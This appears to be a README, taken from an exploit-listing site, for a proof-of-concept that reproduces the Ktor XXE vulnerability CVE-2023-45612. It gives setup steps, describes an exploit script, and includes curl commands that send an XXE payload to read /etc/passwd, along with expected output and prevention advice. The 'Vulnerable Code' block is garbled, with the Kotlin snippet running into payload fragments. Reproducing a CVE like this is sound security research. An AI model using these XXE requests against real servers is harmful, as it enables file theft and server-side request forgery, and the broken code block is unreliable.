Share
## https://sploitus.com/exploit?id=A8E38229-B1CC-58E7-A30C-9A52197F519E
# Ktor XML XXE Vulnerability Reproduction (CVE-2023-45612)

**Research by:** Luka Andghuladze  
**For:** JetBrains Ktor Security Research Internship 2025-2026

XML External Entity (XXE) vulnerability in Ktor framework versions before 2.3.5. The vulnerability exists in the ContentNegotiation plugin when configured with XML serialization using default settings.

---

## Prerequisites

- Java 11 or higher
- Gradle 8.0+
- Python 3.7+

Verify installations:
```bash
java -version
gradle --version
python3 --version
```

---

## Setup and Installation

Navigate to project directory:
```bash
cd jetbrains-ktor-xxe-poc
```

Install Python dependencies:
```bash
pip3 install -r requirements.txt
```

Build the project:
```bash
gradle build
```

---

## Running the Demonstration

**Terminal 1 - Start the vulnerable server:**
```bash
gradle run
```

Wait for: `Responding at http://0.0.0.0:8080`

**Terminal 2 - Run the exploit tests:**
```bash
python3 exploit_tester.py
```

The script tests four scenarios:
1. Normal XML request (baseline)
2. XXE attack reading /etc/hostname
3. XXE attack reading /etc/passwd
4. SSRF attack via XXE

---

## Project Structure

```
jetbrains-ktor-xxe-poc/
โ”œโ”€โ”€ build.gradle.kts                      
โ”œโ”€โ”€ settings.gradle.kts                   
โ”œโ”€โ”€ README.md                             
โ”œโ”€โ”€ requirements.txt                      
โ”œโ”€โ”€ exploit_tester.py                     
โ”œโ”€โ”€ src/main/kotlin/com/jetbrains/ktor/security/
โ”‚   โ”œโ”€โ”€ ServerApplication.kt              
โ”‚   โ””โ”€โ”€ RequestModel.kt                   
โ”œโ”€โ”€ src/main/resources/
โ”‚   โ””โ”€โ”€ logback.xml                       
โ””โ”€โ”€ payloads/
    โ”œโ”€โ”€ legitimate_request.xml            
    โ””โ”€โ”€ xxe_attack_passwd.xml             
```

---

## Technical Details

### Vulnerability Overview

CVE-2023-45612 affects Ktor versions before 2.3.5. The default XML parser configuration in the ContentNegotiation plugin allows:
- DTD processing
- External entity resolution
- Unrestricted entity expansion

This enables attackers to:
- Read arbitrary files from the server
- Perform Server-Side Request Forgery (SSRF)
- Execute Denial of Service attacks
- Potentially achieve remote code execution in specific configurations

### Vulnerable Code

The server uses the default XML configuration:

```kotlin
install(ContentNegotiation) {
    xml()  // Insecure in Ktor 

]>

    Attacker
    &xxe;

```

---

## Expected Results

### On Vulnerable Server (Ktor 2.3.4)

```
[!!!] SERVER IS VULNERABLE TO:
  - File disclosure (/etc/hostname)
  - Critical file access (/etc/passwd)
  - SSRF via XXE

[!] CVE-2023-45612 confirmed
```

---

## Proof of Concept Screenshots

Visual evidence of successful exploitation:

**Server Running:**
![Gradle Server Running](screenshots/Gradlescreenshot.png)

**Exploit Test Results (Part 1):**
![Exploit Results 1](screenshots/Ktor_results_1.png)

**Exploit Test Results (Part 2):**
![Exploit Results 2](screenshots/Ktor_results_2.png)

---

## Implementation Notes

**ServerApplication.kt** - Implements a Ktor server with:
- ContentNegotiation plugin configured for XML
- POST /api/process endpoint that accepts XML data
- Response reflection making XXE exploitation visible

**exploit_tester.py** - Automated testing script that:
- Verifies server connectivity
- Tests baseline functionality
- Attempts multiple XXE attack vectors
- Generates vulnerability report

**RequestModel.kt** - Data class for XML deserialization with kotlinx.serialization

---

## Manual Testing

You can also test manually with curl:

```bash
# Normal request
curl -X POST http://localhost:8080/api/process \
  -H "Content-Type: application/xml" \
  -d @payloads/legitimate_request.xml

# XXE attack
curl -X POST http://localhost:8080/api/process \
  -H "Content-Type: application/xml" \
  -d @payloads/xxe_attack_passwd.xml
```

---

## Prevention Guidelines

To prevent XXE vulnerabilities in Ktor applications:

1. Update to Ktor 2.3.5 or later
2. Configure XML parsers to disable external entities
3. Validate and sanitize all XML input
4. Use JSON instead of XML when possible
5. Implement proper input validation
6. Apply security headers and rate limiting
7. Regular security testing and code reviews

---

## Author

Luka Andghuladze

Research conducted as part of the application for JetBrains Ktor Security Research Internship (2025-2026).
```